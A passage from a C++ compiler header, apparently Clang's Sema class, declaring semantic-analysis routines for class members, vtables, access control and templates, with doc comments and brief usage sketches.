bool isCurrentClassNameTypo(IdentifierInfo *&II, const CXXScopeSpec *SS);
bool ActOnAccessSpecifier(AccessSpecifier Access, SourceLocation ASLoc,
SourceLocation ColonLoc,
const ParsedAttributesView &Attrs);
NamedDecl *ActOnCXXMemberDeclarator(Scope *S, AccessSpecifier AS,
Declarator &D,
MultiTemplateParamsArg TemplateParameterLists,
Expr *BitfieldWidth, const VirtSpecifiers &VS,
InClassInitStyle InitStyle);
void ActOnStartCXXInClassMemberInitializer();
void ActOnFinishCXXInClassMemberInitializer(Decl *VarDecl,
SourceLocation EqualLoc,
Expr *Init);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
SourceLocation LParenLoc,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
SourceLocation EllipsisLoc);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *InitList,
SourceLocation EllipsisLoc);
MemInitResult BuildMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *Init,
SourceLocation EllipsisLoc);
MemInitResult BuildMemberInitializer(ValueDecl *Member,
Expr *Init,
SourceLocation IdLoc);
MemInitResult BuildBaseInitializer(QualType BaseType,
TypeSourceInfo *BaseTInfo,
Expr *Init,
CXXRecordDecl *ClassDecl,
SourceLocation EllipsisLoc);
MemInitResult BuildDelegatingInitializer(TypeSourceInfo *TInfo,
Expr *Init,
CXXRecordDecl *ClassDecl);
bool SetDelegatingInitializer(CXXConstructorDecl *Constructor,
CXXCtorInitializer *Initializer);
bool SetCtorInitializers(CXXConstructorDecl *Constructor, bool AnyErrors,
ArrayRef<CXXCtorInitializer *> Initializers = None);
void SetIvarInitializers(ObjCImplementationDecl *ObjCImplementation);
/// MarkBaseAndMemberDestructorsReferenced - Given a record decl,
/// mark all the non-trivial destructors of its members and bases as
/// referenced.
void MarkBaseAndMemberDestructorsReferenced(SourceLocation Loc,
CXXRecordDecl *Record);
/// Mark destructors of virtual bases of this class referenced. In the Itanium
/// C++ ABI, this is done when emitting a destructor for any non-abstract
/// class. In the Microsoft C++ ABI, this is done any time a class's
/// destructor is referenced.
void MarkVirtualBaseDestructorsReferenced(
SourceLocation Location, CXXRecordDecl *ClassDecl,
llvm::SmallPtrSetImpl<const RecordType *> *DirectVirtualBases = nullptr);
/// Do semantic checks to allow the complete destructor variant to be emitted
/// when the destructor is defined in another translation unit. In the Itanium
/// C++ ABI, destructor variants are emitted together. In the MS C++ ABI, they
/// can be emitted in separate TUs. To emit the complete variant, run a subset
/// of the checks performed when emitting a regular destructor.
void CheckCompleteDestructorVariant(SourceLocation CurrentLocation,
CXXDestructorDecl *Dtor);
/// A class whose vtable has been used within this
/// translation unit, paired with the source location at which the
/// first use occurred.
typedef std::pair<CXXRecordDecl*, SourceLocation> VTableUse;
/// The list of vtables that are required but have not yet been
/// materialized.
SmallVector<VTableUse, 16> VTableUses;
/// The set of classes whose vtables have been used within
/// this translation unit, and a bit that will be true if the vtable is
/// required to be emitted (otherwise, it should be emitted only if needed
/// by code generation).
llvm::DenseMap<CXXRecordDecl *, bool> VTablesUsed;
/// Load any externally-stored vtable uses.
void LoadExternalVTableUses();
/// Note that the vtable for the given class was used at the
/// given location.
void MarkVTableUsed(SourceLocation Loc, CXXRecordDecl *Class,
bool DefinitionRequired = false);
/// Mark the exception specifications of all virtual member functions
/// in the given class as needed.
void MarkVirtualMemberExceptionSpecsNeeded(SourceLocation Loc,
const CXXRecordDecl *RD);
/// MarkVirtualMembersReferenced - Will mark all members of the given
/// CXXRecordDecl referenced.
void MarkVirtualMembersReferenced(SourceLocation Loc, const CXXRecordDecl *RD,
bool ConstexprOnly = false);
/// Define all of the vtables that have been used in this
/// translation unit and reference any virtual members used by those
/// vtables.
///
/// \returns true if any work was done, false otherwise.
bool DefineUsedVTables();
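/// A minimal sketch of the intended protocol (here \c Loc and \c ClassDecl
/// are assumed to be in scope):
///
/// \code
///   MarkVTableUsed(Loc, ClassDecl);        // record the use
///   // ... later, at the end of the translation unit:
///   bool DefinedAny = DefineUsedVTables(); // define pending vtables
/// \endcode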
void AddImplicitlyDeclaredMembersToClass(CXXRecordDecl *ClassDecl);
void ActOnMemInitializers(Decl *ConstructorDecl,
SourceLocation ColonLoc,
ArrayRef<CXXCtorInitializer*> MemInits,
bool AnyErrors);
/// Check class-level dllimport/dllexport attribute. The caller must
/// ensure that referenceDLLExportedClassMethods is called at some point
/// later when all outer classes of Class are complete.
void checkClassLevelDLLAttribute(CXXRecordDecl *Class);
void checkClassLevelCodeSegAttribute(CXXRecordDecl *Class);
void referenceDLLExportedClassMethods();
void propagateDLLAttrToBaseClassTemplate(
CXXRecordDecl *Class, Attr *ClassAttr,
ClassTemplateSpecializationDecl *BaseTemplateSpec,
SourceLocation BaseLoc);
/// Add gsl::Pointer attribute to std::container::iterator
/// \param ND The declaration that introduces the name
/// std::container::iterator.
/// \param UnderlyingRecord The record named by ND.
void inferGslPointerAttribute(NamedDecl *ND, CXXRecordDecl *UnderlyingRecord);
/// Add [[gsl::Owner]] and [[gsl::Pointer]] attributes for std:: types.
void inferGslOwnerPointerAttribute(CXXRecordDecl *Record);
/// Add [[gsl::Pointer]] attributes for std:: types.
void inferGslPointerAttribute(TypedefNameDecl *TD);
void CheckCompletedCXXClass(Scope *S, CXXRecordDecl *Record);
/// Check that the C++ class annotated with "trivial_abi" satisfies all the
/// conditions that are needed for the attribute to have an effect.
void checkIllFormedTrivialABIStruct(CXXRecordDecl &RD);
void ActOnFinishCXXMemberSpecification(Scope *S, SourceLocation RLoc,
Decl *TagDecl, SourceLocation LBrac,
SourceLocation RBrac,
const ParsedAttributesView &AttrList);
void ActOnFinishCXXMemberDecls();
void ActOnFinishCXXNonNestedClass();
void ActOnReenterCXXMethodParameter(Scope *S, ParmVarDecl *Param);
unsigned ActOnReenterTemplateScope(Scope *S, Decl *Template);
void ActOnStartDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnStartDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnDelayedCXXMethodParameter(Scope *S, Decl *Param);
void ActOnFinishDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnFinishDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnFinishDelayedMemberInitializers(Decl *Record);
void MarkAsLateParsedTemplate(FunctionDecl *FD, Decl *FnD,
CachedTokens &Toks);
void UnmarkAsLateParsedTemplate(FunctionDecl *FD);
bool IsInsideALocalClassWithinATemplateFunction();
Decl *ActOnStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
Expr *AssertMessageExpr,
SourceLocation RParenLoc);
Decl *BuildStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
StringLiteral *AssertMessageExpr,
SourceLocation RParenLoc,
bool Failed);
FriendDecl *CheckFriendTypeDecl(SourceLocation LocStart,
SourceLocation FriendLoc,
TypeSourceInfo *TSInfo);
Decl *ActOnFriendTypeDecl(Scope *S, const DeclSpec &DS,
MultiTemplateParamsArg TemplateParams);
NamedDecl *ActOnFriendFunctionDecl(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParams);
QualType CheckConstructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
void CheckConstructor(CXXConstructorDecl *Constructor);
QualType CheckDestructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
bool CheckDestructor(CXXDestructorDecl *Destructor);
void CheckConversionDeclarator(Declarator &D, QualType &R,
StorageClass& SC);
Decl *ActOnConversionDeclarator(CXXConversionDecl *Conversion);
void CheckDeductionGuideDeclarator(Declarator &D, QualType &R,
StorageClass &SC);
void CheckDeductionGuideTemplate(FunctionTemplateDecl *TD);
void CheckExplicitlyDefaultedFunction(Scope *S, FunctionDecl *MD);
bool CheckExplicitlyDefaultedSpecialMember(CXXMethodDecl *MD,
CXXSpecialMember CSM);
void CheckDelayedMemberExceptionSpecs();
bool CheckExplicitlyDefaultedComparison(Scope *S, FunctionDecl *MD,
DefaultedComparisonKind DCK);
void DeclareImplicitEqualityComparison(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
void DefineDefaultedComparison(SourceLocation Loc, FunctionDecl *FD,
DefaultedComparisonKind DCK);
//===--------------------------------------------------------------------===//
// C++ Derived Classes
//
/// CheckBaseSpecifier - Check a parsed base specifier and build a
/// CXXBaseSpecifier if it is valid.
CXXBaseSpecifier *CheckBaseSpecifier(CXXRecordDecl *Class,
SourceRange SpecifierRange,
bool Virtual, AccessSpecifier Access,
TypeSourceInfo *TInfo,
SourceLocation EllipsisLoc);
BaseResult ActOnBaseSpecifier(Decl *classdecl,
SourceRange SpecifierRange,
ParsedAttributes &Attrs,
bool Virtual, AccessSpecifier Access,
ParsedType basetype,
SourceLocation BaseLoc,
SourceLocation EllipsisLoc);
bool AttachBaseSpecifiers(CXXRecordDecl *Class,
MutableArrayRef<CXXBaseSpecifier *> Bases);
void ActOnBaseSpecifiers(Decl *ClassDecl,
MutableArrayRef<CXXBaseSpecifier *> Bases);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base,
CXXBasePaths &Paths);
// FIXME: I don't like this name.
void BuildBasePathArray(const CXXBasePaths &Paths, CXXCastPath &BasePath);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
SourceLocation Loc, SourceRange Range,
CXXCastPath *BasePath = nullptr,
bool IgnoreAccess = false);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
unsigned InaccessibleBaseID,
unsigned AmbigiousBaseConvID,
SourceLocation Loc, SourceRange Range,
DeclarationName Name,
CXXCastPath *BasePath,
bool IgnoreAccess = false);
std::string getAmbiguousPathsDisplayString(CXXBasePaths &Paths);
bool CheckOverridingFunctionAttributes(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionReturnType - Checks whether the return types are
/// covariant, according to C++ [class.virtual]p5.
bool CheckOverridingFunctionReturnType(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionExceptionSpec - Checks whether the overriding
/// function's exception spec is a subset of the overridden function's spec.
bool CheckOverridingFunctionExceptionSpec(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
bool CheckPureMethod(CXXMethodDecl *Method, SourceRange InitRange);
/// CheckOverrideControl - Check C++11 override control semantics.
void CheckOverrideControl(NamedDecl *D);
/// DiagnoseAbsenceOfOverrideControl - Diagnose if 'override' keyword was
/// not used in the declaration of an overriding method.
void DiagnoseAbsenceOfOverrideControl(NamedDecl *D);
/// CheckForFunctionMarkedFinal - Checks whether a virtual member function
/// overrides a virtual member function marked 'final', according to
/// C++11 [class.virtual]p4.
bool CheckIfOverriddenFunctionIsMarkedFinal(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
//===--------------------------------------------------------------------===//
// C++ Access Control
//
enum AccessResult {
AR_accessible,
AR_inaccessible,
AR_dependent,
AR_delayed
};
bool SetMemberAccessSpecifier(NamedDecl *MemberDecl,
NamedDecl *PrevMemberDecl,
AccessSpecifier LexicalAS);
AccessResult CheckUnresolvedMemberAccess(UnresolvedMemberExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckUnresolvedLookupAccess(UnresolvedLookupExpr *E,
DeclAccessPair FoundDecl);
AccessResult CheckAllocationAccess(SourceLocation OperatorLoc,
SourceRange PlacementRange,
CXXRecordDecl *NamingClass,
DeclAccessPair FoundDecl,
bool Diagnose = true);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
bool IsCopyBindingRefToTemp = false);
AccessResult CheckConstructorAccess(SourceLocation Loc,
CXXConstructorDecl *D,
DeclAccessPair FoundDecl,
const InitializedEntity &Entity,
const PartialDiagnostic &PDiag);
AccessResult CheckDestructorAccess(SourceLocation Loc,
CXXDestructorDecl *Dtor,
const PartialDiagnostic &PDiag,
QualType objectType = QualType());
AccessResult CheckFriendAccess(NamedDecl *D);
AccessResult CheckMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *NamingClass,
DeclAccessPair Found);
AccessResult
CheckStructuredBindingMemberAccess(SourceLocation UseLoc,
CXXRecordDecl *DecomposedClass,
DeclAccessPair Field);
AccessResult CheckMemberOperatorAccess(SourceLocation Loc,
Expr *ObjectExpr,
Expr *ArgExpr,
DeclAccessPair FoundDecl);
AccessResult CheckAddressOfMemberAccess(Expr *OvlExpr,
DeclAccessPair FoundDecl);
AccessResult CheckBaseClassAccess(SourceLocation AccessLoc,
QualType Base, QualType Derived,
const CXXBasePath &Path,
unsigned DiagID,
bool ForceCheck = false,
bool ForceUnprivileged = false);
void CheckLookupAccess(const LookupResult &R);
bool IsSimplyAccessible(NamedDecl *Decl, CXXRecordDecl *NamingClass,
QualType BaseType);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found, QualType ObjectType,
SourceLocation Loc,
const PartialDiagnostic &Diag);
bool isMemberAccessibleForDeletion(CXXRecordDecl *NamingClass,
DeclAccessPair Found,
QualType ObjectType) {
return isMemberAccessibleForDeletion(NamingClass, Found, ObjectType,
SourceLocation(), PDiag());
}
void HandleDependentAccessCheck(const DependentDiagnostic &DD,
const MultiLevelTemplateArgumentList &TemplateArgs);
void PerformDependentDiagnostics(const DeclContext *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
void HandleDelayedAccessCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
/// When true, access checking violations are treated as SFINAE
/// failures rather than hard errors.
bool AccessCheckingSFINAE;
enum AbstractDiagSelID {
AbstractNone = -1,
AbstractReturnType,
AbstractParamType,
AbstractVariableType,
AbstractFieldType,
AbstractIvarType,
AbstractSynthesizedIvarType,
AbstractArrayType
};
bool isAbstractType(SourceLocation Loc, QualType T);
bool RequireNonAbstractType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
template <typename... Ts>
bool RequireNonAbstractType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireNonAbstractType(Loc, T, Diagnoser);
}
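/// A usage sketch for the variadic overload above; the diagnostic ID is an
/// assumption, and the selector comes from AbstractDiagSelID above:
///
/// \code
///   if (RequireNonAbstractType(Loc, ReturnType,
///                              diag::err_abstract_type_in_decl,
///                              AbstractReturnType))
///     return true; // the type was abstract; a diagnostic was emitted
/// \endcode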
void DiagnoseAbstractType(const CXXRecordDecl *RD);
//===--------------------------------------------------------------------===//
// C++ Overloaded Operators [C++ 13.5]
//
bool CheckOverloadedOperatorDeclaration(FunctionDecl *FnDecl);
bool CheckLiteralOperatorDeclaration(FunctionDecl *FnDecl);
//===--------------------------------------------------------------------===//
// C++ Templates [C++ 14]
//
void FilterAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
bool hasAnyAcceptableTemplateNames(LookupResult &R,
bool AllowFunctionTemplates = true,
bool AllowDependent = true,
bool AllowNonTemplateFunctions = false);
/// Try to interpret the lookup result D as a template-name.
///
/// \param D A declaration found by name lookup.
/// \param AllowFunctionTemplates Whether function templates should be
/// considered valid results.
/// \param AllowDependent Whether unresolved using declarations (that might
/// name templates) should be considered valid results.
NamedDecl *getAsTemplateNameDecl(NamedDecl *D,
bool AllowFunctionTemplates = true,
bool AllowDependent = true);
enum TemplateNameIsRequiredTag { TemplateNameIsRequired };
/// Whether and why a template name is required in this lookup.
class RequiredTemplateKind {
public:
/// Template name is required if TemplateKWLoc is valid.
RequiredTemplateKind(SourceLocation TemplateKWLoc = SourceLocation())
: TemplateKW(TemplateKWLoc) {}
/// Template name is unconditionally required.
RequiredTemplateKind(TemplateNameIsRequiredTag) : TemplateKW() {}
SourceLocation getTemplateKeywordLoc() const {
return TemplateKW.getValueOr(SourceLocation());
}
bool hasTemplateKeyword() const { return getTemplateKeywordLoc().isValid(); }
bool isRequired() const { return TemplateKW != SourceLocation(); }
explicit operator bool() const { return isRequired(); }
private:
llvm::Optional<SourceLocation> TemplateKW;
};
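/// Illustrative construction of the three cases (here \c TemplateKWLoc is
/// assumed to come from the parser):
///
/// \code
///   RequiredTemplateKind NotRequired;                    // default: not required
///   RequiredTemplateKind IfKeyword(TemplateKWLoc);       // required iff loc is valid
///   RequiredTemplateKind Always(TemplateNameIsRequired); // unconditionally required
/// \endcode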
enum class AssumedTemplateKind {
/// This is not assumed to be a template name.
None,
/// This is assumed to be a template name because lookup found nothing.
FoundNothing,
/// This is assumed to be a template name because lookup found one or more
/// functions (but no function templates).
FoundFunctions,
};
bool LookupTemplateName(
LookupResult &R, Scope *S, CXXScopeSpec &SS, QualType ObjectType,
bool EnteringContext, bool &MemberOfUnknownSpecialization,
RequiredTemplateKind RequiredTemplate = SourceLocation(),
AssumedTemplateKind *ATK = nullptr, bool AllowTypoCorrection = true);
TemplateNameKind isTemplateName(Scope *S,
CXXScopeSpec &SS,
bool hasTemplateKeyword,
const UnqualifiedId &Name,
ParsedType ObjectType,
bool EnteringContext,
TemplateTy &Template,
bool &MemberOfUnknownSpecialization,
bool Disambiguation = false);
/// Try to resolve an undeclared template name as a type template.
///
/// Sets II to the identifier corresponding to the template name, and updates
/// Name to a corresponding (typo-corrected) type template name and TNK to
/// the corresponding kind, if possible.
void ActOnUndeclaredTypeTemplateName(Scope *S, TemplateTy &Name,
TemplateNameKind &TNK,
SourceLocation NameLoc,
IdentifierInfo *&II);
bool resolveAssumedTemplateNameAsType(Scope *S, TemplateName &Name,
SourceLocation NameLoc,
bool Diagnose = true);
/// Determine whether a particular identifier might be the name in a C++1z
/// deduction-guide declaration.
bool isDeductionGuideName(Scope *S, const IdentifierInfo &Name,
SourceLocation NameLoc,
ParsedTemplateTy *Template = nullptr);
bool DiagnoseUnknownTemplateName(const IdentifierInfo &II,
SourceLocation IILoc,
Scope *S,
const CXXScopeSpec *SS,
TemplateTy &SuggestedTemplate,
TemplateNameKind &SuggestedKind);
bool DiagnoseUninstantiableTemplate(SourceLocation PointOfInstantiation,
NamedDecl *Instantiation,
bool InstantiatedFromMember,
const NamedDecl *Pattern,
const NamedDecl *PatternDef,
TemplateSpecializationKind TSK,
bool Complain = true);
void DiagnoseTemplateParameterShadow(SourceLocation Loc, Decl *PrevDecl);
TemplateDecl *AdjustDeclIfTemplate(Decl *&Decl);
NamedDecl *ActOnTypeParameter(Scope *S, bool Typename,
SourceLocation EllipsisLoc,
SourceLocation KeyLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth, unsigned Position,
SourceLocation EqualLoc,
ParsedType DefaultArg, bool HasTypeConstraint);
bool ActOnTypeConstraint(const CXXScopeSpec &SS,
TemplateIdAnnotation *TypeConstraint,
TemplateTypeParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
bool AttachTypeConstraint(NestedNameSpecifierLoc NS,
DeclarationNameInfo NameInfo,
ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs,
TemplateTypeParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
bool AttachTypeConstraint(AutoTypeLoc TL,
NonTypeTemplateParmDecl *ConstrainedParameter,
SourceLocation EllipsisLoc);
QualType CheckNonTypeTemplateParameterType(TypeSourceInfo *&TSI,
SourceLocation Loc);
QualType CheckNonTypeTemplateParameterType(QualType T, SourceLocation Loc);
NamedDecl *ActOnNonTypeTemplateParameter(Scope *S, Declarator &D,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
Expr *DefaultArg);
NamedDecl *ActOnTemplateTemplateParameter(Scope *S,
SourceLocation TmpLoc,
TemplateParameterList *Params,
SourceLocation EllipsisLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
ParsedTemplateArgument DefaultArg);
TemplateParameterList *
ActOnTemplateParameterList(unsigned Depth,
SourceLocation ExportLoc,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> Params,
SourceLocation RAngleLoc,
Expr *RequiresClause);
/// The context in which we are checking a template parameter list.
enum TemplateParamListContext {
TPC_ClassTemplate,
TPC_VarTemplate,
TPC_FunctionTemplate,
TPC_ClassTemplateMember,
TPC_FriendClassTemplate,
TPC_FriendFunctionTemplate,
TPC_FriendFunctionTemplateDefinition,
TPC_TypeAliasTemplate
};
bool CheckTemplateParameterList(TemplateParameterList *NewParams,
TemplateParameterList *OldParams,
TemplateParamListContext TPC,
SkipBodyInfo *SkipBody = nullptr);
TemplateParameterList *MatchTemplateParametersToScopeSpecifier(
SourceLocation DeclStartLoc, SourceLocation DeclLoc,
const CXXScopeSpec &SS, TemplateIdAnnotation *TemplateId,
ArrayRef<TemplateParameterList *> ParamLists,
bool IsFriend, bool &IsMemberSpecialization, bool &Invalid,
bool SuppressDiagnostic = false);
DeclResult CheckClassTemplate(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name, SourceLocation NameLoc,
const ParsedAttributesView &Attr, TemplateParameterList *TemplateParams,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
SourceLocation FriendLoc, unsigned NumOuterTemplateParamLists,
TemplateParameterList **OuterTemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
TemplateArgumentLoc getTrivialTemplateArgumentLoc(const TemplateArgument &Arg,
QualType NTTPType,
SourceLocation Loc);
/// Get a template argument mapping the given template parameter to itself,
/// e.g. for X in \c template<int X>, this would return an expression template
/// argument referencing X.
TemplateArgumentLoc getIdentityTemplateArgumentLoc(NamedDecl *Param,
SourceLocation Location);
void translateTemplateArguments(const ASTTemplateArgsPtr &In,
TemplateArgumentListInfo &Out);
ParsedTemplateArgument ActOnTemplateTypeArgument(TypeResult ParsedType);
void NoteAllFoundTemplates(TemplateName Name);
QualType CheckTemplateIdType(TemplateName Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs);
TypeResult
ActOnTemplateIdType(Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
TemplateTy Template, IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc, SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs, SourceLocation RAngleLoc,
bool IsCtorOrDtorName = false, bool IsClassName = false);
/// Parsed an elaborated-type-specifier that refers to a template-id,
/// such as \c class T::template apply<U>.
TypeResult ActOnTagTemplateIdType(TagUseKind TUK,
TypeSpecifierType TagSpec,
SourceLocation TagLoc,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateD,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgsIn,
SourceLocation RAngleLoc);
DeclResult ActOnVarTemplateSpecialization(
Scope *S, Declarator &D, TypeSourceInfo *DI,
SourceLocation TemplateKWLoc, TemplateParameterList *TemplateParams,
StorageClass SC, bool IsPartialSpecialization);
DeclResult CheckVarTemplateId(VarTemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation TemplateNameLoc,
const TemplateArgumentListInfo &TemplateArgs);
ExprResult CheckVarTemplateId(const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
VarTemplateDecl *Template,
SourceLocation TemplateLoc,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult
CheckConceptTemplateId(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &ConceptNameInfo,
NamedDecl *FoundDecl, ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs);
void diagnoseMissingTemplateArguments(TemplateName Name, SourceLocation Loc);
ExprResult BuildTemplateIdExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
bool RequiresADL,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildQualifiedTemplateIdExpr(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
TemplateNameKind ActOnTemplateName(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
const UnqualifiedId &Name, ParsedType ObjectType, bool EnteringContext,
TemplateTy &Template, bool AllowInjectedClassName = false);
DeclResult ActOnClassTemplateSpecialization(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
SourceLocation ModulePrivateLoc, CXXScopeSpec &SS,
TemplateIdAnnotation &TemplateId, const ParsedAttributesView &Attr,
MultiTemplateParamsArg TemplateParameterLists,
SkipBodyInfo *SkipBody = nullptr);
bool CheckTemplatePartialSpecializationArgs(SourceLocation Loc,
TemplateDecl *PrimaryTemplate,
unsigned NumExplicitArgs,
ArrayRef<TemplateArgument> Args);
void CheckTemplatePartialSpecialization(
ClassTemplatePartialSpecializationDecl *Partial);
void CheckTemplatePartialSpecialization(
VarTemplatePartialSpecializationDecl *Partial);
Decl *ActOnTemplateDeclarator(Scope *S,
MultiTemplateParamsArg TemplateParameterLists,
Declarator &D);
bool
CheckSpecializationInstantiationRedecl(SourceLocation NewLoc,
TemplateSpecializationKind NewTSK,
NamedDecl *PrevDecl,
TemplateSpecializationKind PrevTSK,
SourceLocation PrevPtOfInstantiation,
bool &SuppressNew);
bool CheckDependentFunctionTemplateSpecialization(FunctionDecl *FD,
const TemplateArgumentListInfo &ExplicitTemplateArgs,
LookupResult &Previous);
bool CheckFunctionTemplateSpecialization(
FunctionDecl *FD, TemplateArgumentListInfo *ExplicitTemplateArgs,
LookupResult &Previous, bool QualifiedFriend = false);
bool CheckMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
void CompleteMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
DeclResult ActOnExplicitInstantiation(
Scope *S, SourceLocation ExternLoc, SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc, const CXXScopeSpec &SS,
TemplateTy Template, SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc, ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc, const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S, SourceLocation ExternLoc,
SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S,
SourceLocation ExternLoc,
SourceLocation TemplateLoc,
Declarator &D);
TemplateArgumentLoc
SubstDefaultTemplateArgumentIfAvailable(TemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
Decl *Param,
SmallVectorImpl<TemplateArgument>
&Converted,
bool &HasDefaultArg);
/// Specifies the context in which a particular template
/// argument is being checked.
enum CheckTemplateArgumentKind {
/// The template argument was specified in the code or was
/// instantiated with some deduced template arguments.
CTAK_Specified,
/// The template argument was deduced via template argument
/// deduction.
CTAK_Deduced,
/// The template argument was deduced from an array bound
/// via template argument deduction.
CTAK_DeducedFromArrayBound
};
bool CheckTemplateArgument(NamedDecl *Param,
TemplateArgumentLoc &Arg,
NamedDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
unsigned ArgumentPackIndex,
SmallVectorImpl<TemplateArgument> &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
/// Check that the given template arguments can be provided to
/// the given template, converting the arguments along the way.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateLoc The location of the template name in the source.
///
/// \param TemplateArgs The list of template arguments. If the template is
/// a template template parameter, this function may extend the set of
/// template arguments to also include substituted, defaulted template
/// arguments.
///
/// \param PartialTemplateArgs True if the list of template arguments is
/// intentionally partial, e.g., because we're checking just the initial
/// set of template arguments.
///
/// \param Converted Will receive the converted, canonicalized template
/// arguments.
///
/// \param UpdateArgsWithConversions If \c true, update \p TemplateArgs to
/// contain the converted forms of the template arguments as written.
/// Otherwise, \p TemplateArgs will not be modified.
///
/// \param ConstraintsNotSatisfied If provided, and an error occurred, will
/// receive true if the cause for the error is the associated constraints of
/// the template not being satisfied by the template arguments.
///
/// \returns true if an error occurred, false otherwise.
bool CheckTemplateArgumentList(TemplateDecl *Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs,
bool PartialTemplateArgs,
SmallVectorImpl<TemplateArgument> &Converted,
bool UpdateArgsWithConversions = true,
bool *ConstraintsNotSatisfied = nullptr);
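/// A minimal sketch of the calling convention documented above (here
/// \c Template, \c TemplateLoc and \c TemplateArgs are assumed to be in
/// scope):
///
/// \code
///   SmallVector<TemplateArgument, 4> Converted;
///   if (CheckTemplateArgumentList(Template, TemplateLoc, TemplateArgs,
///                                 /*PartialTemplateArgs=*/false, Converted))
///     return QualType(); // error already diagnosed
///   // Converted now holds the converted, canonicalized arguments.
/// \endcode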
bool CheckTemplateTypeArgument(TemplateTypeParmDecl *Param,
TemplateArgumentLoc &Arg,
SmallVectorImpl<TemplateArgument> &Converted);
bool CheckTemplateArgument(TemplateTypeParmDecl *Param,
TypeSourceInfo *Arg);
ExprResult CheckTemplateArgument(NonTypeTemplateParmDecl *Param,
QualType InstantiatedParamType, Expr *Arg,
TemplateArgument &Converted,
